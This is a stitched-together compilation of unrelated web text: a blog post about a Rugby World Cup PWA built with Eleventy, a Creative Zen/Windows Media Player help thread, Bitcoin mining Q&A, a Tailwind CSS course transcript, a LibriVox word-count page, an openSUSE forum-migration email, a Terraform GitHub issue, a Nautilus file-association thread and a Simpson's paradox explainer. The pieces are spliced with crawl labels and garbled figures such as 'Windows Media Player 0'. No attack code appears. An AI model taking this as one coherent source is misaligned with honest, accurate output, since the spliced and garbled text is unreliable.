If you want to learn more about Simpson's Paradox and its resolution, I suggest these articles, in addition to the wealth of information available on-line:
- J. Mitchem's "Paradoxes in Averages," Mathematics Teacher, April 1989, 250-253
- T. Knapp's "Instances of Simpson's Paradox," College Math Journal, June 1985, 209-210 (source of above ficticious baseball data)
- A. Tan's "A Geometric Interpretation of Simpson's Paradox," College Math Journal, September 1986, 340-341
- M. Calzada & S. Scariano's "Simpson's Paradox and Matrix Determinants," Mathematics and Computer Education, Fall 2000, 237-244
- Z. Usiskin's "Reader Reflections: Simpson's Paradox," Mathematics Teacher, April 1985, 240
|
OPCFW_CODE
|
Adobe’s new Flash Builder version Burrito and Flex SDK Hero previews are out for a while now. While we got awestruck on the mobile version, its limitation of platform support saddens us. Burrito supports only Google Android mobile version.
So we decided to give a try of using Flex SDK Hero to build an iPhone app taking advantage of new Hero features.
This example will walk you through the development of multiscreen iPhone app using Flex SDK Hero. The whole application was tried out in Windows and not on Mac. I don’t see any difference other than the compilation script changes.
- Install necessary tools
- Create Flex Mobile Project, custom compile and pfi
- Deploying it on iPhone
Things you need
- Flash Builder Burrito and Flex SDK Hero (not necessary – comes with Flash Builder Burrito)
- Packager for iPhone
Download and install Flash Builder Burrito. Burrito comes with Flex SDK Hero and needs no seperate installation.
Download and unzip the Packager for iPhone.
Open Flash Builder Burrito, and create a new Flex Mobile Project. Give it a name, say MultiScreenApp. Everything else, leave it as default. Currently Flash Builder supports only Google Android Mobile platform. It doesn’t bother us for now!
Now the project is created, we got to see the main application, which is MultiScreenApp.mxml a spark MobileApplication. This spark MobileApplication has a spark.component.ViewNavigator which has a stack of spark.component.View(s).
spark.component.ViewNavigator is a container for storing, displaying and removing views. Listed below are some of the features of ViewNavigator,
- Define view/action bar transition animation
- Persist Navigation stack and restore it back
- Listen to View change events and many more!
- Define properties like title, titleContent, titleLayout which can also be defined in each View.
Now Views can be added to View navigator and can be navigated to any point of time. A View has a View navigator associated with it, and so from one View, navigation to any other View is possible by using functions like navigation.pushView, navigation.popView, etc.
spark.component.View class provides basic features like,
- Activating a view
- Manipulating Actionbar (which is displayed at the top of the view) and NavigationContent
- Defining layouts for Actionbar and Navigation Content
- Defining title and data
- Persist the view as such.
The first/default view of the MobileApplication is set through firstView property and its data through firstViewData. The created project looks like this, with a default application and a default view.
Lets try creating a simple Hello World app, of course much more can be created than this, but the idea is to create an iPhone app out of it. Lets do that.
Create another view that display the <to be entered name>, lets call it – SayHelloView. In order to pass data to this view, override the data function of spark.component.View.
Similarly, prepare the Home View.
Everything above are straight forward.
Test and Packaging it!
Now to run the application, we got to add the iPhone device (This is not mandatory, but you can get the feel of iPhone while testing it.) Here is how I have added it.
Once this is done, right click on the project and run as Mobile Application. For the first time you’ll be asked to choose the method of testing (on Desktop/on Device) for now select the on Device and select the added iPhone device. Run it!
Packaging for iphone
We cant be using the generated swf as it is meant for a different Platform, so we need a simplified project compilation and for that lets use command line based mxmlc rather than going via Burrito’s way!
Here is the command to compile the project for iPhone packaging,
Step 1 – Compiling
“<Burrito’s Path>\sdks\4.5.0\bin\mxmlc”-load-config “<Burrito’s Path>\sdks\4.5.0\frameworks\airmobile-config.xml”-sp src -o bin-debug\MultiScreenApp.swf src\MultiScreenApp.mxml
This command would produce an swf for our packaging.
Step 2 – Configuring for iPhone
Packaging for iPhone needs special configuration and below is the sample configuration for MultiScreenApp Project. More on iPhone configuration is found on dev guide. Save this file as MultiScreenApp-ios.xml under src directory.
<?xml version=”1.0″ encoding=”utf-8″ standalone=”no”?>
<!– Description, displayed in the AIR application installer.
May have multiple values for each language. See samples or xsd schema file. Optional. –>
<!– <description></description> –>
<!– Copyright information. Optional –>
<!– <copyright></copyright> –>
<!– Publisher ID. Used if you’re updating an application created prior to 1.5.3 –>
<!– <publisherID></publisherID> –>
<!– Settings for the application’s initial window. Required. –>
Step 3 – Packaging for iPhone
Now that iPhone configuration is ready lets do the packaging. We’ll use the latest Packager for iPhone, as of this writing the latest version is Oct.11.2010.
If you have already used Packaging for iPhone, you might very well be familiar with the tags used above. If not, get your hands on packager for iPhone dev guide.
Here is the command for packaging the application.
<Packager4iPhone path>\bin\pfi -package -target ipa-test
-provisioning-profile <my.mobileprovision> -storetype pkcs12 -keystore <my.p12> -storepass <pass>
MultiScreenApp.ipa bin-debug\MultiScreenApp-ios.xml -C bin-debug MultiScreenApp.swf assets\icons
You may need a developer certificate or can get a fake one (for testing), if you are using jailbroken iPhone. The assets\icons folder has the necessary icons for the application.
The command takes some time to execute. This command will result in a MultiScreenApp.ipa.
Deploy the iPhone app using iTunes or any other method you are familiar with.
What is the point?!!
Well the point is “is it worth it?”. Considering the performance, UI Response and native iPhone feel, the answer is no. But remember everything above we have used is still in beta and that means a lot. But we have a beginning here and that make us experienced when the product is ready!!!
|
OPCFW_CODE
|
It would help to know what genre of game you are making. You talk about exposition, "We need to keep the exposition of these ideas short", and I would take this to the extreme if I were you. Show, don't tell. If players don't learn the concepts from the gameplay, then try game isn't about those concepts.
For example, if you want to teach players that ai optimism is not a good default and alignment is hard, give them a chance to do an alignment task or make alignment choices, in which there are optimistic options, that end badly. Or make a game that's almost unwinnable, to emphasize how hard the problem is.
Have you played universal paperclips? I've found it a fun first introduction to ai alignment for people with no knowledge of the topic.
Can we agree to stop writing phrases like this: "Not only do I not think that the Alignment Problem is impossible/hopelessly bogged-down, I think ..."? The three negatives are a semantic mess. Some of still using our wetware here for decoding prose.
Perhaps "Not only am I still hopeful about the alignment problem, but I think" or even "I don't think the alignment problem is hopelessly bogged-down, and I think..."
My understanding is that 'blockchains' are, today, pretty centralized, especially effectively (i.e. in practical ways that matter). Any particular 'blockchain' also seems possibly 'lost' (e.g. abandoned), 'made obsolete', etc.. Isn't there any inherent and inevitable 'social expense' that has to be continually made anyways?
Not really. The blockchains themselves are decentralized, but the applications built on top of them are centralized. To my buying a movie example, suppose I have an app on my SmartTV called "stream1" that lets me buy movies and register them via NFT (cool). I would prefer that to buying them from say Amazon Prime which did not have NFTs, even if it cost an extra dollar or two. 5 years later, stream1 shuts down. I'm not saying I would actually go torrent the movie. What might happen instead is that a new company starts up called "stream2" which allows you to play movies you've bought in the blockchain, as well as buy new movies. Or maybe Amazon prime has added the feature by then and I can connect my licenses to their service. This is equivalent to a new company coming out that sell Blu-ray players. You already own the Blu-rays, they're offering you a way to play them.
I'm very skeptical that the companies that sell products like this would willingly offer terms like what you seem to have in mind, e.g. 'Pay us and then just torrent the movie whenever you want!'.
But this is precisely what we had before the internet. We used to have physical media that (theoretically) could be copied to multiple devices. You weren't legally allowed to, but the technology left you in control. I know gamers as a group want this control back after getting shafted by video game companies.
How would the person or organization requesting someone's diploma verify that the NFT was issued by the relevant college/university?...Surely some kind of centralized database is still required, right? Wouldn't the entity requesting the invoice need to have some kind of 'whitelist' of entities that are approved to issue these NFTs?
How would the person or organization requesting someone's diploma verify that the NFT was issued by the relevant college/university?
Surely some kind of centralized database is still required, right? Wouldn't the entity requesting the invoice need to have some kind of 'whitelist' of entities that are approved to issue these NFTs?
No not at all. The blockchain can do this. The blockchain contains information about who minted it. So a hiring company - say, Google - would know which wallet MIT used for minting their diplomas. If it came from that wallet, then it's legit. In the long run, applications could create a more user-friendly layer. So you paste in the relevant info to your job application, and Google's HR database automatically verifies it on the blockchain.
this just seems like a more convoluted way to 'paywall' a download endpoint.
Definitely it seems like a paywall because it is a paywall. Just a more balanced one. As it is, any time you join any kind of DRM or paywall scheme, you're completely at the mercy of the content host, who can remove your rights to all the stuff you "bought" at any time.
I think this is where there's been a beanie-baby craze with this stuff on the supply side - where some parties are eager to just sell more because there's a new channel. When in fact, what we have is a better channel, and we need to move old sales onto the new channel.
Sure, existing markets won't like it - because they lose control. But it's comparable to how Netflix disrupted Cable TV. People liked the way Netflix served the content better, and cut their cables. Then they became too big to ignore, and all the major content owners got on board. I could see this happening with NFTs too. If I went to buy some digital content and there were two competing marketplaces - I would 100% choose the one that let me really own my purchase via NFT, instead of one that requires me to just trust them to keep it for me.
Trust powers commerce, and I really believe NFT marketplaces implemented properly will drive more people to buy with confidence.
losing access to whatever 'wallet' the NFT is associated with
The process would be the same as if I lost my Physical diploma. Call the university and they have to mint an identical one for me, at a cost to me.
So there are lots of situations where receipts are pretty important, but increasingly there is a push to have them be digitized, either because it's just more efficient or the asset itself is digital. For example, suppose you buy a movie through your smart TV.
The problem is these digital receipts tend to either be just downloadable PDFs - easily forged and effectively meaningless - or they're central databases, which are under the control of the party that owns the database. They can be revoked, lost, made obsolete, etc. Suppose the company that holds my downloaded movie purchase goes bankrupt. Now if I torrent that movie I'm not really breaking the law, or am I? How would I prove that?
A decentralized blockchain system would solve those problems and could be used for proving all kinds of things. "Send us a copy of your diploma" - "here, it's an NFT", "send us your invoice to prove you are in warranty", "here's the NFT", "Can you sell me your old copy of Civilization 4?" "Yes, I'll transfer the NFT to you for $40".
The potential to store trusted receipts has so many useful applications, we're just not quite there yet in terms of building it.
This is my thought exactly. The digital Art NFTs that are selling now or a distraction.
NFTs are a decentralized receipt system which is totally awesome and which you cannot get rich off by collecting receipts.
I also play a few games of chess.com every morning and I have found it has the same use you describe.
I read this book by Rovelli. It's supposed to be the best explanation available, but I still don't really get it.
In the end he suggests that entropy is why we can remember the past but not the future. I'm not sure that's it though.
Still a good read.
|
OPCFW_CODE
|
This article describes a method for remotely accessing virtual servers. The aim is to be able to have multiple clients access one or more virtual servers across one or more physical hosts as if everyone was on the same LAN. It is also necessary to do this without compromising on security and without ANY extra configuration for the virtual servers.
We will achieve this using Qemu and Openvpn.
I’m assuming you have basic knowledge of whatever host operating system you’re using and basic networking knowledge.
I’m not going to bother telling you how to install the two programs you need, etc.
Other than that, I hope I’ve covered everything (or at least pointed you towards external documentation).
If there’s something you’re stuck on then leave a comment or email me (address below) and I’ll do my best to assist and update this guide if necessary.
I will assume that you already have your virtual machines set up. If not then the Qemu manual will get you started.
The guest can be basically any operating system that’s capable of networking. No special configuration is required. I’m just using a few existing virtual machines from previous projects.
You will need to add the following options to the qemu command line:
"-net nic -net tap,script=no,downscript=no"
The “-net nic” option creates a virtual network card. The “-net tap” option creates a tap network device on the host, we will connect this to Openvpn later. For an explanation of what this means, see the Wikipedia article.
Start your virtual machine with the additional options given and assign it a static IP address (I’m using 10.0.0.1).
The Openvpn website contains all the information you could want on configuring Openvpn.
Here’s a link to the documentation: http://openvpn.net/index.php/open-source/documentation/howto.html
Pick a set of instructions that suit your needs and use them as a basis for this setup.
If you only need to connect to the server from one client, select the “quick start guide”. If you need more than one then follow the sections titled “Setting up your own Certificate Authority (CA) and generating certificates and keys for an OpenVPN server and multiple clients.” and “Creating configuration files for server and clients”.
Either of these sets of instructions will give you a decent basis for the rest of this guide. We will choose an IP range for the VPN later on.
Routing or Bridging?
You’ll also need to choose between creating a bridged network or a routed network. Again, the Openvpn site has plenty of information on making this choice, consider reading this page.
In summary, use bridging if you need network broadcasts for any reason or want to be able to browse for windows shares (eg: under “network neighbourhood”, etc). Otherwise use routing.
The two (rather crude, I’m afraid) diagrams below illustrate the differences between the two setups.
In the bridged setup, ethernet frames (black arrows) are transferred across the VPN. This enables non-IP traffic to be transferred, but increases the overheads. The two TAP devices are bridged in this setup.
In the routed setup, IP packets (green arrows) are transferred across the VPN. This results in less data needing to be transferred across the VPN.
IP range setup
If you’re using a bridged setup then you should use the “server-bridge” option to set the client and server IPs.
You should put everything in the same subnet.
You should leave some room free in the subnet for the virtual server.
For example, I assigned my virtual server 10.0.0.1.
I’m assigning the Openvpn server 10.0.0.2 and clients IPs from 10.0.0.50 to 10.0.0.100.
The config file line looks like this:
server-bridge 10.0.0.2 255.255.255.0 10.0.0.50 10.0.0.100
If you’re using a routed setup then you should use the “server” option to set the client and server IPs.
You should use seperate subnets for the VPN and virtual server.
For example, my virtual server is 10.0.0.1.
I’m assigning the Openvpn server 10.1.0.1 and clients IPs from 10.1.0.2 to 10.1.0.254.
The config file line looks like this:
server 10.1.0.0 255.255.255.0
You’ll also need to tell the Openvpn server to instruct clients to add a routing entry for the virtual server’s subnet:
push "route 10.0.0.0 255.255.255.0"
Connecting the two
The method for connecting the two is different depending on whether you chose bridging (tap adapter) or routing (tun adapter). Either way, I assume you’ve started Qemu and Openvpn successfully and can connect to the Openvpn server ok.
For the bridging scenario you have two tap devices, one created by Qemu and one by Openvpn. All you need to do is bridge the two.
Configure the tap devices:
# ifconfig tap0 0.0.0.0 promisc up
# ifconfig tap1 0.0.0.0 promisc up
Create the bridge device:
# brctl addbr br0
# ifconfig br0 0.0.0.0 promisc up
Add the tap devices to the bridge:
# brctl addif br0 tap0
# brctl addif br0 tap1
If you chose to configure Openvpn for routing then you have one tap device created by Qemu and one tun device created by Openvpn.
It’s just a simple matter of configuring the host to forward packets between the two.
Assign an IP address to the tap device:
# ifconfig tap0 10.0.0.2
Enable IP forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward
Testing it out
You should now be able to communicate between the client and the virtual server.
If you chose a routed setup, you can also ping between the client and physical server (over the vpn) and between the physical server and the virtual one. This may be useful for locating problems.
Adding more virtual servers
In a bridged setup, adding more virtual servers is extremely easy. Simply start the new VM exactly as you did the first one and add the new TAP device to the bridge.
# brctl addif br0 tap2
With a routed setup, if you want more than one virtual server you’ll have to add a host route for each virtual server.
# route add 10.1.0.1 dev tap1
# route add 10.1.0.2 dev tap2
Adding more physical servers
If you add more physical servers then they will (confusingly) be openvpn clients.
Configure it exactly like any other client. Connecting the virtual servers on a new physical server is done exactly as we did it earlier in the article.
You will need to add the “client-to-client” option to your configuration file.
If you see any errors with this article, have any comments/suggestions or need any help then feel free to leave a comment or email me (address below) and I will get back to you.
Thanks for reading, I hope this has been useful.
|
OPCFW_CODE
|
Spotify API Inconsistency: Integer Values Returned as Floats Without Documentation Update
We've observed a recent and undocumented change in Spotify's API behavior, specifically regarding the data type of certain values that were traditionally returned as integers. This alteration is gradually being implemented across various endpoints, with a notable example being the tracks endpoint. Previously, values such as "duration_ms" would be returned as integers (e.g., "duration_ms": 2345). However, we are now receiving these values as floats (e.g., "duration_ms": 2345.0), despite the official web API reference still indicating that integers are to be expected.
This discrepancy has been confirmed to affect multiple endpoints and is causing issues for applications with strict type requirements, where floats are not expected in places where integers were previously provided. As a result, typed applications that rely on these integer values are experiencing breaks in functionality.
A discussion thread exists on the Spotify Developer Forums highlighting this issue, but responses and clarifications from Spotify have been minimal: Spotify Developer Forums Thread.
As a temporary workaround, I have modified all applicable properties in my application from type int to float and performed a cast back to int where necessary (I'm still on a very old version of SpotifyAPI-NET but I guess this affects the latest version too). Checking the latest code it seems like the models for the API response are still typed and thus this issue will also arise in the current release. Models. While this approach has resolved the issue for my application and benefitted my users, it is not an ideal or sustainable solution.
The staggered rollout of these API changes has further complicated diagnosis and troubleshooting, especially since the effects were not immediately evident across all user bases.
I am raising this issue here so others know what's up, if they encounter Newtonsoft.Json.JsonReaderException.
Discussed in https://github.com/JohnnyCrazy/SpotifyAPI-NET/discussions/925
Originally posted by rogamaral January 5, 2024
Since yesterday and suddenly, without any changes to the code, I started to have the following exception:
Newtonsoft.Json.JsonReaderException:
'Input string '359120.0' is not a valid integer.
Path 'followers.total',
line 1, position 127.'
var artist = await _spotify.Artists.Get(artistId);
Does anyone else also have this problem?
Thanks.
This issue seems to be happening to multiple developers, including myself, and has been discussed previously in #925, #926 and #928. For me, it randomly stopped happening after few days.
This issue seems to be happening to multiple developers, including myself, and has been discussed previously in #925, #926 and #928. For me, it randomly stopped happening after few days.
I'm aware that this was discussed. I raised the issue out of #925 to further spread awareness for it.
The Newtonsoft.JSON Deserializer should convert int to double if int is returned from the API and double is expected. Thats why the approach of changing the types might work long term.
Well I should read all the discussions beforehand. It seems the Serializer has been modified to convert.
My bad!
Hi @Inzaniity,
I'm also experiencing the JsonReaderException on some properties, for instance album.total_tracks. Updating to the latest SpotifyAPI.Web (7.1.1) did not fix them all.
If I add the DoubleToIntConverter attribute to the properties that still cause the exceptions it's ok again.
So it seems to me we should add the DoubleToIntConverter attribute to all int properties so it doesn't break when Spotify decides to return doubles/floats somewhere. What do you think?
Hi @Inzaniity, I'm also experiencing the JsonReaderException on some properties, for instance album.total_tracks. Updating to the latest SpotifyAPI.Web (7.1.1) did not fix them all.
If I add the DoubleToIntConverter attribute to the properties that still cause the exceptions it's ok again.
So it seems to me we should add the DoubleToIntConverter attribute to all int properties so it doesn't break when Spotify decides to return doubles/floats somewhere. What do you think?
I mean that is what I did but on an older code base. So yeah, converting all expected ints seems to be the solution here.
A Spotify developer confirmed a fix for this in the discussion on the Spotify developer forum
An optimization in the deserialization of JSON in upstream was causing the serializer to default to double types for integer values. The optimization was not applied to all queries, and several tools were sanitizing the response which was the reason we did not uncover this from the start.
|
GITHUB_ARCHIVE
|
An ad-free and cookie-free website.
A Python tutorial on the beginner's first 8 Python math functions to learn before advancing to more difficult math in NumPy and Pandas modules.
Videos can also be accessed from our Full Stack Playlist 3 on YouTube.
Eight Python builtin math functions | Python for Beginners (4:51)
Welcome. Today's question: Which 8 math functions should Python beginners learn first?
I'm Paul, and here we cover data science, so it's important that we learn basic math functions before heading off to the exotic, fun and head-scratching stuff like Statistics.
So here we'll stick with functions built-in to Python with a review of 3 we covered earlier, then tack on 2 for calculations on single numbers, followed by 3 that operate on a range of numbers.
This closes out the 11-video Project 3 (Python for Beginners). Hang on for the end and I'll tell you what Project 4 is all about.
(Commands in Linux)
(Functions in Python)
Let's head to the Linux terminal and here's a file with all of the built-in functions in this version of Python.
Noted is where each function was introduced, and here in video 32, we're checking off absolute value, power, maximum, minimum and summation.
|abs() (32)||dict()||help(28)||min() (32)||setattr()|
|bin()||eval()||int() (27)||open()||str() (26)|
|bool()||exec()||isinstance()||ord() (26)||sum() (32)|
|bytes()||float() (27)||iter()||print() (26)||tuple()|
|complex()||hasattr()||max() (32)||round() (27)|
(Also See official documentation at the official python.org.)
For now we're working with two data types in math, we have integers, and when entered without a decimal place, Python assumes it's an integer.
We also have floats, or floating point numbers entered with a decimal.
So with 8 functions to cover; let's get cracking.
int(), views a float as an
It won't change it; it will just view it (as an integer).
float(), does the
opposite, view an integer as a float.
round(), and here we input
how many decimal places we'd like to round a number to, using an
optional argument after a comma, telling Python where you want it to
The default rounds to a whole number. And there's object help, if you forget how it works.
Function 4, is absolute value. Here's the help.
q to leave.
Here we input one number and it returns the absolute value, so
abs(x) which is negative 2, becomes
It works with floats too.
Function 5, Python power. Let's get in the habit of looking at help,
help(pow) in this case.
And let's do the two argument version.
So it goes 3 to the power of 2 is 9, and going the other way, 9 to the power of one-half, or the square root, is 3.0.
For function 6, let's set up a range of numbers, let's call them grades, and assign some percentile scores over a semester, like this.
I'll put them in what is called a list like this, and use
max() to find the highest grade of 99.
help() we can see there are two
ways to work with
max(), and here
we're using the second option, saving the first on iterables for later.
min() is done the same way.
No surprises there.
Function 8, summation or
how that works, and it won't work on text, which is obvious.
Let's throw the list of grades in and we get 442.
But that's more meaningful if we get an average, dividing by 5 and that gives us 88.4, eh, a B-plus.
On the topic of average, and other statistical calculations we won't have to put them together ourselves like this. Instead, in later videos we'll import modules allowing us to do linear algebra, regressions and all sorts of math with neat visualizations.
Also, if you're not familiar with my background, in a previous life, I managed $5 Billion in stock mutual funds in the US, so the subject matter expertise I'll bring to the table is in the financial markets.
So a number of projects will be geared to those aspiring to be financial engineers, quants and portfolio managers. We'll also use Python to analyze data for marketing, social media and more.
In the meantime, this concludes Project 3, and in Project 4 we'll kick off HTML and CSS for Beginners so we can create web pages to view all of our neat output in a browser.
And coding right in the Python Interpreter will be phased out as well. We'll work with multi-line files almost exclusively.
To be part of the fun, please subscribe and comment so others can learn from your insights, and your observations.
Have a nice day.
Check out other learning content at our YouTube Channel. Subscribe to our email list and follow @factorpad on Twitter so you don't miss new content.
A newly-updated free resource. Connect and refer a friend today.
|
OPCFW_CODE
|
This initiative advanced the use of open standards for integrating environmental, building, and IoT data in Smart Cities. It focused on the capabilities to be supported by a 3D IoT Smart City Platform under CityGML, IndoorGML, and SensorThings API. Scenarios explored included real-time monitoring of micro-dust and indoor occupancy.
The goal of the pilot has been to advance the use of open standards for integrating environmental, building, and internet of things (IoT) data in Smart Cities. Under this initiative a proof of concept (PoC) has been conducted to better understand the capabilities to be supported by a 3D IoT Smart City Platform leveraging the following standards:
Outdoor 3D City Model: CityGML
Geo-IoT: SensorThings API
The scenarios selected to demonstrate this concept included:
Real-time monitoring of indoor occupancy (IndoorGML + SensorThings)
Real-time monitoring of PM2.5 micro-dust (CityGML + SensorThings)
Smart cities are communities where information technology and data are used to address social, economic, and environmental challenges. Smart Cities solutions are both popular for improving city livability, and necessary for responding to trends such as climate change and increasing urbanization.
Sejong City, founded in 2007 is the new administrative city of South Korea. Sejong 5-1 (A District) is the site of a wide-ranging Smart City Initiative, led by the Korea Land and Housing (LH) Corporation. Projects under this initiative include the following:
AR/VR Service (Smart City Experience Zone)
A video of the Sejong City Smart City Initiative is available on YouTube.
The Korea Land and Housing (LH) Corporation sponsored this OGC pilot that complemented the work being advanced in the Sejong Smart City Initiative.
The following organizations were selected as initiative participants. Each participating organization had specific deliverables and tasks based on their responses to the Call for Participation.
Steinbeis Transferzentrum Technische Beratung an der HFT Stuttgart
Feng Chia University (GIS.FCU)
Call for Participation
Call for Participation (CfP) release
Proposals due Call for Participation
CfP responses due
Selection of Participants and Bidder Notifications
02-Oct-2019 to 28-Feb-2020
Initial Test and Integration Testing
Engineering Report Draft
OGC Technical Meeting in Asia
Final Engineering Report
Demonstrations are planned for the June virtual TC and for Asia will likely occur physically or virtually in Korea from in August 2020.
We represent over 500 businesses, government agencies, research organizations, and universities united with a desire to make location information FAIR – Findable, Accessible, Interoperable, and Reusable.
|
OPCFW_CODE
|
Noah VailSon made my AvatarPremium
One more Distro: IPFire - Lightest weight - Works w/Hyper-V
IPFire is an option worth considering.
quote:It will run as a Hyper-V guest without any special integration tools.
Requirements are minimal: an Intel Pentium I compatible CPU (i586), 128 MB RAM, and 1GB disk space.
For routing, at least 2 network interfaces are required.
Actually, it was the only distro I could get to run under Hyper-V - way back when.
Below is the text from their feature page.
You can find a list of selected addons below. Or take a look to the List of all Addons!
The Samba addon offers a fast file server for Windows or heterogeneous networks.
The NFS server offers the possibility to share files over the network.
CUPS is a standard, open source, printing system over the network.
The Mailserver that IPFire uses, is a mixture of Cyrus-IMAPd, Postfix and Openmailadmin.
Additionally you can choose: Fetchmail, Spamassassin and ClamAV or other virus scanners.
MPFire (TESTING) adds jukebox features to IPfire.
Icecast streams the output of MPFire to the network.
Gnump3d is a server for streaming MP3- and OGG-files.
VDR (TESTING) is a video recording / streaming server for digital TV cards.
Videolan (TESTING) The VLC player is a streamingserver solution - see more at : http://www.videolan.org
Voice over IP
Asterisk (TESTING) is the ideal platform for Voice over IP - have a look at: http://www.asterisk.org/
Teamspeak offers you your own VoIP communication server at home. Brilliant for SWTOR or WoW Raids ;-) - find more at: http://www.teamspeak.com. (It is also possible to install a Teamspeak 3 Server)
Guardian analyzes Snort-files and ssh-Logfiles and blocks the Source IP (so the IDS can be upgraded to an IPS).
Tripwire is a Host-Based IDS System, t.m. it monitors local changes.
Lynis is a Commandline Auditing Tool for a local scan of system and software.
Cryptsetup with Cryptsetup and the Kernel Module “dmcrypt”, is it possible to create encrypted devices.
PPTP (TESTING) VPN access through PPTP.
mdadm (TESTING) With mdadm is it possible to create software RAID devices.
RTorrent Bittorrent Client for ncurses written in C++ : it's small and fast.
Transmission A Bittorrent Client with webinterface.
Sane allows you to scan documents via the network with a webinterface.
Qemu virtualization for guest OSses in IPFire - 64bit hardware and Hyper-V is recommended.
Dirvish is a backup solution for IPFire (no regular IPFire addon!!!).
TinyWebGalerie is a free PHP based WebGallery for IPFire.
Apcupsd is a tool to monitor APC's Uninterupted Power Supplies (UPS).
NUT TESTING Network UPS Tools.
miau a bouncer for the IRC network.
watchdog TESTING Watchdog daemon.
pound TESTING Reverse proxy and load balancer.
Tftpd IPFire as a Tftpd server.
SideMenu EX Extension of IPFire´s Side menus (not a regular IPFire Addon!!).
BackupPC Backup solution with webinterface (not a regular IPFire Addon!!!).
Cacti Tool for visualization of network data with RRDtool and SNMP.
Nagios powerful tool for the monitoring of complex IT infrastructures.
EGroupware EGroupware is a powerful communication solution for companies and groups (not a regular IPFire Addon!!!).
Xen Paravirtualization of guest operating system
mdns-repeater - mDNS repeater daemon (in progress)
Some tools to optimize your network and for trouble shooting
iperf test your network speed (LAN oder WLAN).
bwm-ng is a bandwidth monitor
nmap is a versatile (and very mighty) ip/port scanner - see: http://nmap.org for further details
tcpdump is a tool to watch and control your network connections
iftop is a realtime bandwidth monitor
traceroute is a network tool used to follow your packets through the internet
Wireless IPFire with hostapd
The Dark Tower's Skynet evolves from 4chan.
·Future Nine Corp..
Server functions do not belong on an edge appliance! I refer to those types of firewall distros as swiss army knife distros that try to be everything.
Also running a firewall on a virtual appliance makes as much sense as wearing virtual underwear except for development.
When IPFire first started, the developer was referring to a few other distros as potty yet the same developer was using quite a bit of code copied directly from the very distros he was badmouthing. I have no confidence in this individual.
|
OPCFW_CODE
|
Effects And Animations
Selecting Components Within The Dom With Jquery
- While you could use two IDs – one to open the overlay and one other to shut it – you’ll as a substitute use a category to open and shut the overlay with the identical operate.
- I love the method in which you show how html, css, js, and jquery working together.
This article will cover the options of JQuery, the logic and cause behind the success of this framework, and the method it stayed so vital all this time. According to Stack Overflow’s 2023 survey, 22.87% of builders nonetheless use JQuery, it is the third most popular web framework and one of the starred repositories on GitHub. Some would argue that it is giant, which might affect your web performance… However, because of its popularity, it’s more likely to have already been used on some site you’ve got visited earlier than. Most browsers nowadays are good about caching scripts/images, so that obtain hit is reduced over time.
Hottest Programming Languages To Study In 2023
At the very least, create a manual WordPress backup before you proceed. The kind of DOM manipulation described above would go unnoticed by net guests if all of it occurred as soon as a page loaded. That’s why your jQuery software can detect and reply to occasions like mouse clicks, mouse movement, keystrokes, and extra to create a really responsive expertise. Add jQuery to your web site by linking the library’s code from the site’s pages. The jQuery library might be in your net server or a publicly accessible content delivery network (CDN). The official jQuery web site can hook you up with the most recent versions of the library.
And if you need to construct jQuery-powered websites and applications, check out Kinsta’s WordPress hosting, Application internet hosting, and Database internet hosting options. The jquery handle jquery developers has been assigned to the jQuery library on the Cloudflare CDN and it stays a dependency for the local my_script. You can use the same strategy to drag different jQuery parts — like jQuery-UI — from a CDN.
Add jQuery UI plugins to your initiatives, and you’ll have access to many special results and widgets built on the core jQuery library. Here’s an example utilizing jQuery UI to add a pop-up calendar as a date-picker within an internet kind. JQuery UI is a well-liked assortment of plugins designed to enhance person interfaces. JQuery also offers a unified, constant API that operates across https://www.globalcloudteam.com/ different browsers, eliminating the need for browser-specific code. The idea behind the success comes in the ability of the framework to convey more folks on board. To explain, this framework is supported by a big neighborhood of developers, demonstrating that not solely is JQuery present however additionally it is here to stay for a very long time.
|
OPCFW_CODE
|
Examples for sending direct messages?
Hi
In the API Readme, I see the following line:
Send direct messages or list direct messages in inbox
But I couldn't find example code or even the classes in the source
that I could use to send DMs.
Can someone help?
Thanks!
I've just thrown together this code by looking through IGDM (which uses this API):
const iClient = require("instagram-private-api").V1;
const device = new iClient.Device("myuser");
const storage = new iClient.CookieFileStorage(__dirname + "/myuser.json");
iClient.Session.create(device, storage, "myuser", "mypassword").then((session) => {
iClient.Thread.getById(session, "messageid").then((thread) => {
thread.broadcastText("Hello World!").then((threadWrapper) => {
console.log(threadWrapper);
});
});
});
Hi Jake,
Thanks for the example.
Can you also give me an example for getting the direct messages sent by the other person?
Thanks in advance
Sent from my Samsung Galaxy smartphone.
-------- Original message --------
From: Jake Walker<EMAIL_ADDRESS>Date: 19/09/2018 7:12 pm (GMT+03:00)
To: huttarichard/instagram-private-api<EMAIL_ADDRESS>Cc: Saziya Banu<EMAIL_ADDRESS>Manual<EMAIL_ADDRESS>Subject: Re: [huttarichard/instagram-private-api] Examples for sending direct messages? (#563)
I've just thrown together this code by looking through IGDMhttps://github.com/ifedapoolarewaju/igdm (which uses this API):
const iClient = require("instagram-private-api").V1;
const device = new iClient.Device("myuser");
const storage = new iClient.CookieFileStorage(__dirname + "/myuser.json");
iClient.Session.create(device, storage, "myuser", "mypassword").then((session) => {
iClient.Thread.getById(session, "messageid").then((thread) => {
thread.broadcastText("Hello World!").then((threadWrapper) => {
console.log(threadWrapper);
});
});
});
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHubhttps://github.com/huttarichard/instagram-private-api/issues/563#issuecomment-422863528, or mute the threadhttps://github.com/notifications/unsubscribe-auth/Aj6wwOQ3A529hSIqZQ2I4ly_N6kwS-aGks5ucmz7gaJpZM4WqGvX.
In the thread object you can do thread.items to get all of the chat message objects. I've done this so far:
thread.items.forEach((message => {
console.log(`${message._params.text} from ${message._params.userId}`);
});
Thanks much, Jake.
Can you tell me what is the 'messageid' parameter that you have mentioned in,
iClient.Thread.getById(session, "messageid").then((thread) => {
Thanks
Is there any way, I can get only the direct messages sent by the other person, not by me. I want to get only the last direct message of my friend.
Thanks in advance
You can get your 10 most recent chats by doing:
var chats = new Client.Feed.Inbox(session, 10);
chats.all().then((latestchats) => {
latestchats.forEach((chat) => {
console.log(chat.id);
});
});
And for your other question, each chat object has the ID of the user who has sent the message. I think it's something like message._params.userid you could then use an if to only select messages with your friend's ID.
Hope this helps.
hello
i got this error below , i cannot figure out from where should i debug my code
Unhandled rejection NotFoundError: Page wasn't found!
i used the above example to test sending message to myself .
Regards
Ali Ahmed Nada
|
GITHUB_ARCHIVE
|
More specifically, a Force object can do any or all of the following:
Add a contribution to the force on each particle
Add a contribution to the potential energy of the System
Modify the positions and velocities of particles at the start of each time step
Define parameters which are stored in the Context and can be modified by the user
